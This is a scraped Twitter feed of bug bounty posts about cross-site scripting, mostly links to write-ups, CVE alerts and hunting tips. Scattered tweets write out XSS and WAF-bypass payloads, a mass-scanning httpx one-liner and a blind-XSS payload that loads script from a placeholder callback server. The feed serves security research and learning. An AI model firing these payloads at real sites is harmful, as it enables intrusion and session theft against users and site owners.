Twitter Feed
Rachid.A (zhero_) 🇵🇸
@blank_cold, a year ago: My write-up on my solution to the Intigriti XSS challenge has been selected, don't hesitate to take a look! 🧩 Thanks @intigriti! Here : https://t.co/QLivsjCNNb #CTF #Hacking #bugbountytips #bugbountytip https://t.co/a9VbeF8mwi
Ziad Ali
@ziadali84681393, a year ago: Exploit an unexploitable XSS via an open redirect — A Real-Life Scenario from a Hacker’s Mindset https://t.co/z3HBoRS8fn #infosec #cybersecurity #cybersecuritytips #pentesting #redteam #CyberSec #cyberattacks #cybersecurityawareness #bugbounty #bugbountytips #xss #medium
Cristiano
@TheMsterDoctor1, a year ago: @hakluke @hbenja_m How to hack web applications in 2023: Part 1 🚀 💻 Types of web apps ⚙️ Setting up for testing 🪲 RCE 🐞 SQLi 🐛 XXE 🪳 Insecure Deserialization 🐜 XSS And that's just Part 1! 😱 👇 #hacking #pentesting #bugbountytip https://t.co/23mql5Wuk9
HackenProof
@HackenProof, a year ago: Vuln: Stored XSS A persistent attack aims to inject malicious code into popular user-supplied input points, such as comments on blog posts, username fields, and message boards. #bugbounty #offensivesecurity https://t.co/3OqZFnnINU
HADESS
@Hadess_security, a year ago: 🧪 XSS Labs 1️⃣ node-react-dangerously-set-html-links https://t.co/ql3AyDhI5i 2️⃣ dotnet-can-you-see-your-reflection https://t.co/sO5qtvmVHF 3️⃣ java-reflected-xss https://t.co/eAfqy2tIvK #xss #appsec #securecoding #bugbounty #bugbountytips
H1 Disclosed - Public Disclosures
@h1Disclosed, a year ago: ⚡ Stored XSS in merge request pages 👨💻 mike12 ➟ GitLab 🟥 High 💰 $3,500 https://t.co/wTWRzBM22U #bugbounty #bugbountytips #cybersecurity https://t.co/wKp5mtZOZN
Akanbi Oluwakunle Johnson
@akanbi_kunle, a year ago: Good day, My journey in #XSS #BugBounty is getting more interesting and lovely. $ (Json) leads to a lot of rat role in a program if is not properly use. As a programmer is ideal to create different Folder for all your PROG language...@esther_hamzat @0x0SojalSec @cybergbeja
CRAC Learning - Tech
@cracbot, a year ago: CVE-2023-27613 (CVSS:7.1, HIGH) is Received. Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in MonitorClick Forms Ada – Form Builder plugin <= 1.0 versio.. https://t.co/O65YCMSXtL #cybersecurityawareness #cybersecurity #CVE #infosec #hacker #nvd #mitre
ss0x00 🤞
@ss0x00, a year ago: Automation found an easy DOM XSS in one of the H1 target. Takeaways: Running automation on a large scale works :) Article I discussed about this: https://t.co/b8lGMN9GmE #bugbounty #bugbountytips #automation https://t.co/0uBPAQnFEO
cyb3r_ark97
@ironrafelia, a year ago: #cyb3r_ark97stipsntricks #1 When you want to create XSS payload for a subdomain of a target... Don't forget to look at the page source to see where your input is getting stored....if not then use Burp Suite intercept to see if the input gets transferred to an API #bugbounty
VIEH Group
@viehgroup, a year ago: The XSS Revolution: A Game-Changer in the Cybersecurity Landscape https://t.co/6fZSPehvFN #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
EL Sayed Mohammed
@ElsayedMo77amed, a year ago: My last submission @Bugcrowd Cross site scripting (xss) Html injection. Program vdp 🤡 #bugbountytip #bugbounty #xss #bugcrowd https://t.co/Y3qoWSMlPK
BeyondMachines
@beyondmachines1, a year ago: XSS Flaw Exposes Wordpress Beautiful Cookie Consent Banner plugin to attack campaign #cybersecurity #infosec #advisory #vulnerability https://t.co/wbqT4nDrsF
Cybertix
@thecybertix, a year ago: Bug Type: Blind XSS 🫣 Link: https://t.co/PCBVvU1w3y Please Share your Views & Subscribe to our YouTube channel🙏 Thanks everyone for your great Support☺️ #bugbountytips #YouTube #bug https://t.co/uSt1b1iQBl
Shah Sheikh
@shah_sheikh, a year ago: XSS Flaw Riddled Beautiful Cookie Consent Banner WP Plugin: Heads up, WordPress admins! It’s time to update your websites with the latest Beautiful Cookie… XSS Flaw Riddled Beautiful Cookie Consent Banner WP Plugin on Latest Hacking News | Cyber… https://t.co/u5lOnoxAUj https://t.co/iDIvgYMC6r
Sayaan Alam
@ehsayaan, a year ago: Found a stored and blind xss on HackerOne through live support chat, <script> tag didn’t work so I used <iframe src=“javascript:alert(document.domain)” /> and it did work #bugbounty https://t.co/sVFmgS4YNH
Md Maruf Hosan ⚡
@0xMaruf, a year ago: Script tag blocked? No more blind xss? Try blind HTML injection. Tip: "><img src=https://t.co/s4t6cjAdsb> #bugbountytips #bugbountytip #BugBounty
CyberSherlockX
@cybersherlockx, a year ago: Hi #bugbounty community, can you help me escalate an open redirect to XSS or SSRF? I have tried a few things, but I am unable to escalate it further. Your suggestions will be appreciated #bugbounty #infosec #cybersecurity @GodfatherOrwa @ADITYASHENDE17
Ali Tütüncü
@alicanact60, a year ago: @LiveOverflow @SaveToNotiom #bugbountytips #XSS #P1 #P0 Thx
HackTube5
@HackTube5, a year ago: CVE-2023-29489 Cpanel xss #cve #BugBounty #xss https://t.co/dPI81pYeR9
CRAC Learning - Tech
@cracbot, a year ago: CVE-2023-33332 (CVSS:7.1, HIGH) is Received. Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in WooCommerce Product Vendors plugin <= 2.1.76 versions... https://t.co/85AutunaMR #cybersecurityawareness #cybersecurity #CVE #infosec #hacker #nvd #mitre
CRAC Learning - Tech
@cracbot, a year ago: CVE-2023-33319 (CVSS:7.1, HIGH) is Received. Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in WooCommerce WooCommerce Follow-Up Emails (AutomateWoo) plu.. https://t.co/LTLnE19Osh #cybersecurityawareness #cybersecurity #CVE #infosec #hacker #nvd #mitre
CRAC Learning - Tech
@cracbot, a year ago: CVE-2023-32800 (CVSS:7.1, HIGH) is Received. Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in One Rank Math SEO PRO plugin <= 3.0.35 versions... https://t.co/MxsH5gXhGE #cybersecurityawareness #cybersecurity #CVE #infosec #hacker #nvd #mitre
CRAC Learning - Tech
@cracbot, a year ago: CVE-2023-33326 (CVSS:7.1, HIGH) is Awaiting Analysis. Unauth. Reflected (XSS) Cross-Site Scripting (XSS) vulnerability in EventPrime plugin <= 2.8.6 versions... https://t.co/Le8nLL5Jea #cybersecurityawareness #cybersecurity #CVE #infosec #hacker #nvd #mitre
CRAC Learning - Tech
@cracbot, a year ago: CVE-2023-33309 (CVSS:7.1, HIGH) is Awaiting Analysis. Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Awesome Motive Duplicator Pro plugin <= 4.5.11 versions... https://t.co/Ep83piJSKH #cybersecurityawareness #cybersecurity #CVE #infosec #hacker #nvd #mitre
Maham Farizul
@0xmahamsec, a year ago: Tips whenever you saw any email input field! 70% bug hunters don't try XSS there as compared to name field. always try this in email input field! "<img/src/onerror=alert(0)"@xss.com This don't work every time but give it a try found 2 XSS today using this! #bugbountytips
hakluke 👨💻🚀
@hakluke, a year ago: How to hack web applications in 2023: Part 1 🚀 💻 Types of web apps ⚙️ Setting up for testing 🪲 RCE 🐞 SQLi 🐛 XXE 🪳 Insecure Deserialization 🐜 XSS And that's just Part 1! 😱 👇 #hacking #pentesting #bugbounty https://t.co/uHIDJu0if2
Jambler.org
@NewsesBtc, a year ago: It's faster than zomato I reported vulnerability and within 30 minutes I got response from company.🤩🤑 It's a blind xss triggered on admin panel. #BugBounty #cybersecuritytips #ethicalhacking #xss https://t.co/fEPYypKp4t
Rachid.A (zhero_) 🇵🇸
@blank_cold, a year ago: I admit, I spent a while on it. But I got arbitrary XSS on mozilla/chrome without limit - with 90 characters. Can't wait to see the colleagues' payloads. I will now write my report on @intigriti and go back to hunting 🏹 #BugBounty #infosec #CTF https://t.co/BKzJw8hZqi https://t.co/6g5lN51Ab7
Amir Hossein
@amir_h_fallahi, a year ago: In this video I looked at XSS in Vue.js, which can be useful for programmers, bug hunters and pentesters. I hope you like it. Slides: https://t.co/k3O4Kk1ltk https://t.co/RMNAeAHImq #AppSec #XSS #web_security #Vue #bugbounty #pentest
WAF bypass
@waf_bypass, a year ago: waf_bypass is sharing the best way to #bypass #WAF XSS Payloads - simple, effective & tested! 💡It's worth checking out for 🤗great results. 💻#infosec #cybersecurity #XSSpayload https://t.co/nRB2cNxmkt
Mahshooq Zubair
@mq_xz_, a year ago: The XSS Revolution: A Game-Changer in the Cybersecurity Landscape by: thexssrat https://t.co/QM8iDtOZs7 #bugbounty #WriteUps
Shubham Tiwari
@shubhamtiwari_r, a year ago: Excited to share my Bug Bounty Script It automates security tests & reconnaissance for target domains including, web server scanning, subdomain enumeration XSS vulnerability scanning, and more!🐞🔍 Check it out GitHub: [https://t.co/gqvmvMqNyH] #BugBounty #SecurityTesting #bug
Who Am I ?
@19who_am_i19, a year ago: My New Reflected Xss write up , Check it out !!🖤 https://t.co/vyOFZc6bXI #bugbountytips #BugBounty #websecurity #cybersecuritytips #hackers #HackerOne
LinuxSecurity Live Advisory Updates
@LS_Advisories, a year ago: Cross site scripting (XSS) vulnerabilities were found in rainloop, a web based email client, which could lead to information disclosure including passphrase leak. Debian LTS... @lnxsec #DebianLTS #Linux #infosec #opensource #linuxsecurity https://t.co/loKeGkEn1K https://t.co/Oy5VJSEAwR
Akanbi Oluwakunle Johnson
@akanbi_kunle, a year ago: Just found a Reflected XSS on a site. The site uses java script Library, the site encode any XSS payload automatically. {Second Slide} Using URL encode to base64URL it shows the site is Vulnerable to Reflected XSS. ( First Slide) #bugbounty #BugBounty #bugbountytips https://t.co/tyudW4wIPN
Osvaldo G Del Rio
@0sdelri0, a year ago: Sharing a small XSS - BugBounty! :) https://t.co/1FGJnUzYcd
Akanbi Oluwakunle Johnson
@akanbi_kunle, a year ago: I am working on XSS alone anything about XSS Bug bounty. #Bugbounty #Xsspayloads #Burpsuite @0xblackbird thanks of the link. Will be submitting my first XSS Bug in a short time.
VIEH Group
@viehgroup, a year ago: Automated XSS at Scale | Powered by @pdiscoveryio | Creds: @_bughunter cat rootDomains.txt | assetfinder -subs-only | httpx -nc -silent -t 50 -p 80,443,8443,8080 -path "/?xss=\"</script><script>alert(\"XSS\")</script>" -mr "<script>alert(\"XSS\")</script>" #infosec #cybersec
haksec.io
@haksecio, a year ago: Pro hacking tip: Set keyboard shortcuts for your go to XSS and SQLi payloads!
HackersNews.co.uk
@HackersNews247, a year ago: Find Us @HackersNews247 For The Latest News Or Visit Our Website Hackers News! #Hacking #Hacked #HackersNews #hacker #Hackingtime #Anonymous #hacktheplanet #news #NewsUpdates https://t.co/ViTSIJ6qnw
Hammad 🇵🇰
@Hammad7361, a year ago: After 2 months of Triaged report I was awarded $$$ on @Bugcrowd #ItTakesACrowd #bugbounty Reward range was $100-$750 for P3 and they chose to pay $100 😂, Submitted them 1 more XSS will have to wait 2 months again to get that $100 again 😂 https://t.co/nWn1is9Ind
$@urabh $!ddh@®am $@nmane
@saurabhsanmane2, a year ago: It's faster than zomato I reported vulnerability and within 30 minutes I got response from company.🤩🤑 It's a blind xss triggered on admin panel. #BugBounty #cybersecuritytips #ethicalhacking #xss https://t.co/0s8VX1d14S
CRAC Learning - Tech
@cracbot, a year ago: CVE-2023-21516 (CVSS:7.5, HIGH) is Received. XSS vulnerability from InstantPlay in Galaxy Store prior to version 4.5.49.8 allows attackers to execute javascript API .. https://t.co/F1I2x1J7ME #cybersecurityawareness #cybersecurity #CVE #infosec #hacker #nvd #mitre
CRAC Learning - Tech
@cracbot, a year ago: CVE-2023-29098 (CVSS:7.1, HIGH) is Awaiting Analysis. Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in ArtistScope CopySafe Web Protection plugin <= 3.13 version.. https://t.co/JueoJEeuKx #cybersecurityawareness #cybersecurity #CVE #infosec #hacker #nvd #mitre
Cyber Wiki
@theCyberWiki, a year ago: TOR Network - https://t.co/JkE9jtpcTi #CyberWiki #theCyberWiki #HackHunt #Hack #Hacker #Hacking #EthicalHacking #Network #EthicalHacker #Cybersecure #Cybersecurity #Vulnerable #Software #Pentesting #XSS #VAPT #Audit #Forensics #Coding #BugHunting #TOR #DarkWeb #OnionRouter https://t.co/uXGeMkOTs5
im-ream.nft🗸
@im_ream, a year ago: @MeAsHacker_HNA @SaveToNotion #tweet #xss #bugbounty #tools
WAF bypass
@waf_bypass, a year ago: 🤓 WAF_Bypass has shared great insights on how to #bypass #WAF XSS Payloads! 💡It's simple & effective. 🤗Check it out now for the best results. 💻 #infosec #cybersecurity #XSSpayload https://t.co/nRB2cNxmkt
Infination Technology
@infination, a year ago: #bugbounty #discovery #exploitation #tooling #techniques #tradecraft #Expo #Gitlab #Trezor #Nokoyawa $MSFT #Windows #zeroday $GOOGL #GCP #CloudSQL #Zyxel #Barracuda #Wordpress #XSS #infosec #security
Seribuakal
@Seribuakal, a year ago: XSS To RCE Exploits #infosec #cybersecurity #bugbounty #hacking #exploits #seribuakal #tips https://t.co/GbF68TG1Vi
WAF bypass
@waf_bypass, a year ago: Seribuakal shares 💡key insights on how to bypass #WAF XSS Payloads with simple yet effective techniques. 🤓Check it out now for the best results! 🤗 https://t.co/nRB2cNxmkt #infosec #cybersecurity #XSSpayload
Zack Security
@ZackSecutity, a year ago: #BugBounty #bugbountytips #hackerspace #Linux #XSS #LFI #DeepWeb #websecurity #Apps #bugs #Web3 #webdevelopment https://t.co/xNvcY8Q2FE
ASecurity
@asecurityinfo, a year ago: Basic of XSS #asecurity #BugBounty #bugbountytips (1/2) https://t.co/haMO2ul27T
Bug bounty notes
@bugbounty0, a year ago: How I found DOM-Based XSS on Microsoft MSRC and How they fixed it #bugbounty #bugbountytip #infosec #bugbountytips https://t.co/3YsKYbAsPB
ASecurity
@asecurityinfo, a year ago: XSS BYPASS PAYLOAD #websecurity #asecurity #xss #payloads #bypass #xsspayloads #bugbounty #bugbountytips https://t.co/Eb6KMIgP01
Thee Eclipse
@Thee_Eclipse, a year ago: It's 30 days since: cPanel CVE-2023-29489 !! Time to hunt for it on bug bounty programs!! 🎩Did you know:: CVE-2023-29489 bypasses the 403 Forbidden error and renders XSS on the pages #BugBounty #bugbountytips #Hacking #CyberSecurityAwareness #intigriti #cpanel #ethicalhacking
CRAC Learning - Tech
@cracbot, a year ago: CVE-2022-45366 (CVSS:7.1, HIGH) is Awaiting Analysis. Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Jason Crouse, VeronaLabs Slimstat Analytics plugin <= 5.0... https://t.co/NWpId7p1oB #cybersecurityawareness #cybersecurity #CVE #infosec #hacker #nvd #mitre
Linode
@linode, a year ago: This week's security digest covers a Linux NetFilter use-after-free Kernel vulnerability, WordPress Core v6.2 XSS/CSRF/Directory Traversal vulnerabilities, and more: https://t.co/HLMIDgxP30 #InfoSec #CyberSecurity
Bhagirath Saxena 🇮🇳
@rix4uni, a year ago: I need some help, i spend around 14 days on a program that have a wildcard *https://t.co/FbAW6BO1qd tested xss,lfi,sqli,ssrf,rce but not found anything, what you will recommend to stick this program or move other program @GodfatherOrwa @krishnsec @bug_vs_me #bugbounty
Brier & Thorn México
@BrierandThornMX, a year ago: Ongoing attacks are targeting an unauthenticated stored cross-site scripting (XSS) vulnerability in a #WordPress cookie consent plugin called Beautiful Cookie Consent Banner. #2023 #Infosec #BT https://t.co/If5F2VA3Py
wtf_yodhha
@wtf_yodhha, a year ago: Bugbounty Tip✅✨ For Android devices, Modify the device name to your BXSS payload "><script/src=//yourserver.xss.ht>//" There is a possibility that the device name leading to blind XSS issues in various applications. #bugbountytips #bugbounty #ethicalhacking
Joh
@ctfiraq, a year ago: @h4x0r_dz Because it’s the real hacking Not just an xss you found in searchbar and you got 💲💲😆
oolong
@hacksForOolong, a year ago: Day 35 of #100DaysOfHacking Just solved : Web - Client/XSS DOM Based - Filters Bypass challenge on Root-Me :þ https://t.co/t0bUBHAojp @rootme_org #hacking #challenge #WebClient
oolong
@hacksForOolong, a year ago: Day 35 of #100DaysOfHacking Just solved : Web - Client/XSS DOM Based - Introduction challenge on Root-Me :þ https://t.co/Sl7iCcWhw0 @rootme_org #hacking #challenge #WebClient
7h3h4ckv157
@7h3h4ckv157, a year ago: XSS Via Qr Code https://t.co/Zt8qFKgua1 #xss #QR #WebsiteTesting #VulnerabilityAssesment #infosec #Medium #bug #bugbountytips #BugBounty #bugbountytip #Hacking
7h3h4ckv157
@7h3h4ckv157, a year ago: How I found a tricky XSS https://t.co/rD3Qj9wNVh #xss #bugbountytips #BugBounty #BugBounty #bug #infosec
7h3h4ckv157
@7h3h4ckv157, a year ago: How I found Reflected XSS in Users login page on Public Program ? https://t.co/tko1d2Unba #bugbountytips #BugBounty #bugbountytip #bug #XSS #infosec #Medium
M S Munir
@ms_munir_420, a year ago: Reflected XSS Approach Credits: https://t.co/UWQKv6teqy #infosec #cybersecurity #cybersecuritytips #pentesting #redteam #informationsecurity #CyberSec #networking #networksecurity #infosecurity #cyberattacks #security #linux #cybersecurityawareness #bugbounty #bugbountytips https://t.co/X09lzEuwMN
unpaired_electron
@Ajay_jachak24, a year ago: The filename is reflected on a web page is there any way to execute the XSS here?? DM me #BugBounty #bugbountytips #HackerOne #BugCrowd https://t.co/vsTI34idFq
LaneSystems Ltd
@LaneSystems, a year ago: #Hackers target 1.5M #WordPress sites with cookie consent plugin exploit https://t.co/rxbT3bcHRV Ongoing attacks for #XSS #vulnerability in #BeautifulCookieConsentBanner plugin. Upgrade to v2.10.2 #CyberSecurity #InfoSec #Patch
Darren Ewers
@DarrenEwers, a year ago: Hackers target 1.5M WordPress sites with cookie consent plugin exploit. Ongoing attacks are targeting an Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability in a WordPress cookie consent plugin https://t.co/04FM5mrriq #Hacking #Wordpress #hackers #HackersNews
Ares Austria
@ares_austria, a year ago: @y3tiCrypto @dynexcoin Imagine being this lax about security, though. It's incredible. The Cloudflare WAF patches a simple XSS for the new domain, but there's more from where this came from for the explorer and new client wallet 😱 #infosec #security $DNX #dynex #CryptoTwitter https://t.co/SfyFWzeTcb https://t.co/oRTkSduNew
Lohitaksh Nandan
@NandanLohitaksh, a year ago: Burpsuite Extensions for #XSS • XSS Validator • Reflected Parameters • DOM XSS Checks • Burp Hunter • Reflector • Feminda • BitBlinder #bugbounty #bugbountytips #hacking #pentesting #cybersecurity
WAF bypass
@waf_bypass, a year ago: Kudos to cyberninja8881 & SchoobyDrew for their 💪 teamwork to crack an XSS vuln & get a CVE! 🎉 Check out their blog post to learn how they bypassed a WAF. 🤓 #cybersecurity #infosec #WAF #XSS 🛡️ 🔐 🔗 https://t.co/dHjvyuRVO9
MITUL KALSARIYA
@Mitulkalsariya2, a year ago: Study common security vulnerabilities like SQL injection, cross-site scripting (XSS), and cross-site request forgery (CSRF). Familiarize yourself with cybersecurity concepts like encryption, authentication, and penetration testing. #InfoSec #CyberAwareness
WAF bypass
@waf_bypass, a year ago: Kudos to cyberninja8881 & SchoobyDrew for their 💪 teamwork to find an XSS vuln & get a CVE! 🤓 Read their blog post to find out how they bypassed a WAF. 🔗 https://t.co/dHjvyuRVO9 #cybersecurity #infosec #WAF #XSS 🛡️ 🔐
Raj Haraniya
@rpharaniya, a year ago: @_Zer0Sec_ @SaveToNotion #tweet #bugbounty #xss
Md Ismail Šojal
@0x0SojalSec, a year ago: CloudFlare WAF bypass inside <A> tag or location=payload example.tld/#1/-alert(23)// javascript:Object.prototype.toString=RegExp.prototype.toString;Object.prototype.source=location.hash;[{}]+[]/**/instanceof{[Symbol.hasInstance]:eval} Credits: https://t.co/4PtYYK4tFr #infosec
ႢႭႹႠ ႭႵႰႠႻႤ გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze, a year ago: #bugbountytips #BugBounty @WebSecAcademy Self reflect XSS on the portswigger web security academy JWT lab https://t.co/9XFjRs5YIO via @YouTube
Ali Alhamad علي الحمد
@proalialhamad, a year ago: A useful and fast tool for using google dorks to catch xss, Open redirects and information disclosure vulnerabilities https://t.co/u3ojhopttE #bugbountytips #BugBounty https://t.co/RekEqucNsc
Md Ismail Šojal
@0x0SojalSec, a year ago: Blind XSS All 📓 - https://t.co/7yL4G3AI7B - https://t.co/kMfCYBFuIf - https://t.co/aDLeQul8bG - https://t.co/MgoHmAJTKA - https://t.co/E0V4mTcKZ5 - https://t.co/X5zoaDnNw9 by @thecyberzeel https://t.co/sA7M5btOcW by @0xAwali #infosec #learn365 #bugbounty
Masonhck357
@Masonhck3571, a year ago: #Bugbountytips When hunting for Blind XSS, remember to use a unique identifier for each payload and log your steps meticulously. That way, when a delayed trigger hits your XSS Hunter account, you’ll know exactly where it came from. Stay patient, stay diligent! #masonhck357… https://t.co/TyowQlSNNl
Shane Brighton
@shanebrighton, a year ago: Identify and Fix XSS Vulnerabilities in Your Web App https://t.co/uKEn5FmuDu #cloudsecurity #itsecurity #secops #infosec
SearchEngineJournal®
@sejournal, a year ago: This #WordPress plugin makes your site vulnerable to Cross-Site Scripting (XSS) attacks https://t.co/inpjEwTLut #infosec #technicalseo https://t.co/Q394oBllXC
Cybernoz
@Cybernozcom, a year ago: The basics of Cross-site Scripting (XSS) https://t.co/c3Jw5EKVCZ #cybersecurity #cybersecuritynews #cybernews #infosec #informationsecurity
Nova Security
@novasecio, a year ago: 2) Get more advanced: https://t.co/Dzu5fYsbHB https://t.co/YRBLEnYtv2 https://t.co/5GbWfT7eFD https://t.co/jCyyR7J7Gj https://t.co/6tR1JWndQP
Nova Security
@novasecio, a year ago: 1) Learn the ropes: https://t.co/6XIC5SLsiO https://t.co/6L6Nx6zYp4 https://t.co/qKM288dujb https://t.co/CFjWZNjxre https://t.co/wNAVWhKDhA https://t.co/xUjwTRKTSA
Cybertix
@thecybertix, a year ago: Bug Type: Stored XSS Subscribe to our YouTube channel: Link: https://t.co/c6zTMaPxRT #bugbountytips #bughunting #YouTube #shorts #Reels #hacking #Types #artificalintelligence #BugBounty #bugbountytip #money #PassiveIncome #automation #informationsecurity #bug #hack https://t.co/syR7iY3KHG
LinuxSecurity Live Advisory Updates
@LS_Advisories, a year ago: Fedora 38: dokuwiki 20239e5f85ad02 Update to hotfix release 20230404a (fixes an XSS vulnerability). Fedora Update Notification FEDORA20239e5f85ad02 20230524 01:16:03.410... @lnxsec #Fedora #Linux #infosec #opensource #linuxsecurity https://t.co/r5TNDYgOLL https://t.co/SUUnR55hox
WAF bypass
@waf_bypass, a year ago: Kudos to cyberninja8881 & SchoobyDrew for their teamwork to find XSS vuln & get a CVE! 💪 🤓 Check out their blog post to learn how they bypassed a WAF. 🔗 https://t.co/dHjvyuRVO9 #cybersecurity #infosec #WAF #XSS Aaron0n waf_bypass
Save to Notion
@SaveToNotion, a year ago: @cobra0x011 This thread is saved to your Notion database. Tags: [Bugbountytips, Javascript, Xss]
Cobra0x011 | DFIR
@cobra0x011, a year ago: @micro0x00 @SaveToNotion #thread #bugbountytips #javascript #xss
Clint Gibler
@clintgibler, a year ago: 🔖 A smorgasbord of a bug chain Chaining multiple vulnerabilities to achieve a 1-click CSRF attack: * An Insecure message event listener * A JSONP endpoint * A WAF Bypass * A DOM-based XSS * A permissive CORS configuration #bugbountytips By @jub0bs https://t.co/6cgZHPgdpZ
Bug bounty notes
@bugbounty0, a year ago: Cracked XSS — Intigriti Challenge 0223 by Dr. Leek #bugbounty #bugbountytip #infosec #bugbountytips https://t.co/0bk62YBVlU
SOC Prime
@SOC_Prime, a year ago: #Sigma rule to detect CVE-2023-29489 exploitation attempts, a reflected #XSS #vulnerability in #cPanel exposing millions of websites worldwide to the risk of compromise. https://t.co/nSA50xqrLm #CVE #DFIR #infosec #threathunting #BlueTeam #threatdetection #infosec #exploit #SOC https://t.co/QZLY14Wy7b
M7arm4n
@M7arm4n, a year ago: After a hard time to bypassing Akamai to pop up an XSS, Finally done. thanks to @brutelogic & @PortSwigger <a href="https://www.domain.tld/m7arm4n" contenteditable onbeforeinput="[origin].map(top['ale'+'rt'])" >here</a> #WAF #Bypass #bugbountytips https://t.co/ljF1YWDBjF
![profile](https://pbs.twimg.com/profile_images/1646313566843092993/_uzui5ZN_normal.jpg)
Ashraf Abdelrazik
@ashabdelrazik a year ago Account Takeover Everywhere 🤨 Happy Hacking Month. #hackwithautomation #cybersecurity #crawler #bugbounty #infosec #bugbountytips #hacking #ChatGPT #xss #sqli #sqlinjection #pentesting #CTF #recon #hackerone #bugcrowd #ethicalhacking https://t.co/aLMQjYCmQ2
![profile](https://pbs.twimg.com/profile_images/1646313566843092993/_uzui5ZN_normal.jpg)
Ashraf Abdelrazik
@ashabdelrazik a year ago XSS POC Videos https://t.co/ZffA3dQQFR #hackwithautomation #cybersecurity #crawler #bugbounty #infosec #bugbountytips #hacking #ChatGPT #xss #sqli #sqlinjection #pentesting #CTF #recon #hackerone #bugcrowd #ethicalhacking https://t.co/ZBhhuiCBus
![profile](https://pbs.twimg.com/profile_images/1653323500449419267/WYVbhtSu_normal.jpg)
Eve🧚♀️
@ex16x41 a year ago What's the (any) xss payload that got you a bc or h1 submissions?? How did you weaponize it for poc? Was there specific web software or waf you bypassed? I'm curious :^) #bugbountytips #curious #xss #hacking #bugcrowd #hackerone https://t.co/2RMTa46Qdw
![profile](https://pbs.twimg.com/profile_images/1481231355249930531/j4fUPznC_normal.jpg)
Patrik Fehrenbach
@ITSecurityguard a year ago @bugbounty_memes Yes, this is an accurate tweet about an XSS in a Plugin Wordpress plugin :D
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatoris a year ago XSS with style attribute background-image - Visit https://t.co/MFuC2fUBwU for the solution. #xss #infosec #softwareengineer #softwareengineering #engineer
![profile](https://pbs.twimg.com/profile_images/1586304872395202561/j1V90xCg_normal.jpg)
insane_Coder
@AnounimM a year ago I found the bypass for all *.stripe.com csp protection, I'll use it with xss but still can't find xss #BugBounty
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Disclosed a year ago ⚡ XSS vulnerability without a content security bypass in a `CUSTOM` App through Button tag 👨💻 @saajanbhujel ➟ Stripe 🟧 Medium 💰 $2,000 https://t.co/OFsGtTokky #bugbounty #bugbountytips #cybersecurity https://t.co/AbLfioOvEC
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Disclosed a year ago ⚡ Possible XSS vulnerability without a content security bypass 👨💻 @saajanbhujel ➟ Stripe 🟧 Medium 💰 $2,000 https://t.co/o1BF60plul #bugbounty #bugbountytips #cybersecurity https://t.co/2qJAiUABXW
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSec a year ago You can bypass Akamai WAF's XXE filters by HTML encoding the SYSTEM entity within a payload like this: <!DOCTYPE foo [<!ENTITY % a "&#x3c;&#x21; ... omitted ... #infosec #bugbountytip #cybersecuritytips #xss
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSec a year ago Blind XSS at scale 🔥🔥🔥 #infosec #bugbountytip #cybersecuritytips https://t.co/7lZpPe0VNV
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSec a year ago This extension will help you to detect GET/POST based XSS vulnerability in any website easily - https://t.co/PIZCaKqXMl #infosec #bugbountytip #cybersecuritytips
![profile](https://pbs.twimg.com/profile_images/1400908768205066250/G3Ys4s5i_normal.jpg)
David Parkinson Frost
@ParkinsonFrost a year ago Service outage in @MSFT365Status, @Cisco discloses a zero-day used in XSS attacks, Mirai botnet exploiting CVE-2023-1389, and much more for this week's infosec news! (Anybody else here have papyrophobia? 🥹🗒️🩸) Thanks @rskvp93 @_q5ca @hoangnx99 for the research efforts! https://t.co/qzJzsZzxWm
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_ a year ago Cisco XSS zero-day flaw and PaperCut vulnerabilities #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1605993395788333071/Fgalr7xl_normal.jpg)
M7arm4n
@M7arm4n a year ago Finally, After some while I reported my first blind XSS that was cooler than I think. Always spray blind XSS payload in every input and use Burp match and replace for headers. #BugBounty #bugbountytips #bugbountytip https://t.co/hzr2WmEtUT
![profile](https://pbs.twimg.com/profile_images/1635776504155054086/neTlqQh5_normal.jpg)
kro
@1337Kro a year ago #wordpress #bugbountytips Login page xss payload:- /wp-login.php?wp_lang=%20=id=x+type=image%20id=xss%20onfoc%3C!%3Eusin+alert(1337)%0c https://t.co/9yMdruqXfL
![profile](https://pbs.twimg.com/profile_images/1321492899931062274/gN82sXoD_normal.jpg)
Thek41234
@thek41234 a year ago @bughunty @SaveToNotion #tweet #bugbounty #xss #tip #automate
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks a year ago (CVE-2023-2361): Cross-site Scripting (XSS) - Stored in pimcore/pimcore. https://t.co/cMGybvolO6 Disclosed by https://t.co/r9ocxdn15q, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1625500493245214720/WS0i1Tdu_normal.jpg)
R3VEAL
@R3_VEAL a year ago Hall of fame in @auspost for the second time #BugBounty 😌❤️ #bugbountytip : Carefully observe every parameter and test for xss payloads. Make sure to customise your payload according to the site. 👨🏻💻 https://t.co/wAzmRhrfEs
